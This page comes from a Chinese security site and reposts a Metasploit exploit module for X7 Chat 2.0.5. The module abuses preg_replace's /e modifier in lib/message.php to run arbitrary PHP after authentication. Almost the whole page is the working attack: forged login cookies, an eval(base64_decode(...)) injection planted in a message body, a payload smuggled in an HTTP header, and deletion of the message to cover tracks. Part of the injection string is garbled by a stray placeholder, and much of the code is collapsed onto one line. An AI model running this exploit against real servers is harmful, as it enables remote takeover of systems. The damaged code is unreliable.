首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution
来源:metasploit.com 作者:Escobar 发布时间:2014-11-06  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution',
      'Description'    => %q{
        This module exploits a post-auth vulnerability found in X7 Chat versions
        2.0.0  up to 2.0.5.1. The vulnerable code exists on lib/message.php, which
        uses preg_replace() function with the /e modifier. This allows a remote
        authenticated attacker to execute arbitrary PHP code in the remote machine.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Fernando Munoz <fernando[at]null-life.com>', # discovery & module development
          'Juan Escobar <eng.jescobar[at]gmail.com>', # module development @itsecurityco
        ],
      'References'     =>
        [
          # Using this URL because isn't nothing else atm
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/4076']
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Generic (PHP Payload)', {}]],
      'DisclosureDate' => 'Oct 27 2014',
      'DefaultTarget'  => 0))

      register_options(
      [
        OptString.new('USERNAME', [ true, 'Username to authenticate as', '']),
        OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', '']),
        OptString.new('TARGETURI', [ true, 'Base x7 Chat directory path', '/x7chat2']),
      ], self.class)
  end

  def check
    res = exec_php('phpinfo(); die();', true)

    if res && res.body =~ /This program makes use of the Zend/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Unknown
    end
  end

  def exec_php(php_code, is_check = false)

    # remove comments, line breaks and spaces of php_code
    payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')

    # clean b64 payload (we can not use quotes or apostrophes and b64 string must not contain equals)
    while Rex::Text.encode_base64(payload_clean) =~ /=/
      payload_clean = "#{ payload_clean } "
    end
    payload_b64 = Rex::Text.encode_base64(payload_clean)

    cookie_x7c2u = "X7C2U=#{ datastore['USERNAME'] }"
    cookie_x7c2p = "X7C2P=#{ Rex::Text.md5(datastore['PASSWORD']) }"
    rand_text = Rex::Text.rand_text_alpha_upper(5, 8)

    print_status("Trying for version 2.0.2 up to 2.0.5.1")
    print_status("Sending offline message (#{ rand_text }) to #{ datastore['USERNAME'] }...")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'index.php'),
      'headers'  => {
        'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
      },
      'vars_get' => {
        # value compatible with 2.0.2 up to 2.0.5.1
        'act'     => 'user_cp',
        'cp_page' => 'msgcenter',
        'to'      => datastore['USERNAME'],
        'subject' => rand_text,
        'body'    => "#{ rand_text }www.{${eval(base64_decode(
___FCKpd___0
SERVER[HTTP_#{ rand_text }]))}}.c#{ rand_text }", } }) unless res && res.code == 200 print_error("Sending the message (#{ rand_text }) has failed") return false end if res.body =~ /([0-9]*)">#{ rand_text }/ message_id = Regexp.last_match[1] user_panel = 'user_cp' else print_error("Could not find message (#{ rand_text }) in the message list") print_status("Retrying for version 2.0.0 up to 2.0.1 a1") print_status("Sending offline message (#{ rand_text }) to #{ datastore['USERNAME'] }...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'headers' => { 'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };", }, 'vars_get' => { # value compatible with 2.0.0 up to 2.0.1 a1 'act' => 'usercp', 'cp_page' => 'msgcenter', 'to' => datastore['USERNAME'], 'subject' => rand_text, 'body' => "#{ rand_text }www.{${eval(base64_decode(
___FCKpd___0
SERVER[HTTP_#{ rand_text }]))}}.c#{ rand_text }", } }) unless res && res.code == 200 print_error("Sending the message (#{ rand_text }) has failed") return false end if res.body =~ /([0-9]*)">#{ rand_text }/ message_id = Regexp.last_match[1] user_panel = 'usercp' else print_error("Could not find message (#{ rand_text }) in the message list") return false end end print_status("Accessing message (#{ rand_text })") print_status("Sending payload in HTTP header '#{ rand_text }'") if is_check timeout = 20 else timeout = 3 end res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'headers' => { 'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };", rand_text => payload_b64, }, 'vars_get' => { 'act' => user_panel, 'cp_page' => 'msgcenter', 'read' => message_id, } }, timeout) res_payload = res print_status("Deleting message (#{ rand_text })") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'headers' => { 'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };", }, 'vars_get' => { 'act' => user_panel, 'cp_page' => 'msgcenter', 'delete' => message_id, } }) if res && res.body =~ /The message has been deleted/ print_good("Message (#{ rand_text }) removed") else print_error("Removing message (#{ rand_text }) has failed") return false end # if check return the response if is_check return res_payload else return true end end def exploit unless exec_php(payload.encoded) fail_with(Failure::Unknown, "#{peer} - Exploit failed, aborting.") end end end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux/x86 Add map in /etc/host
·i-FTP Buffer Overflow SEH Expl
·Linux Local Root => 2.6.39 (32
·i.Hex Local Crash Proof of Con
·Drupal < 7.32 Pre Auth SQL Inj
·i.Mage Local Crash Proof of Co
·Mac OS X Mavericks IOBluetooth
·Citrix NetScaler SOAP Handler
·Xerox Multifunction Printers (
·Belkin n750 jump login Paramet
·GNU Wget FTP Symlink Arbitrary
·PicsArt Photo Studio For Andro
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved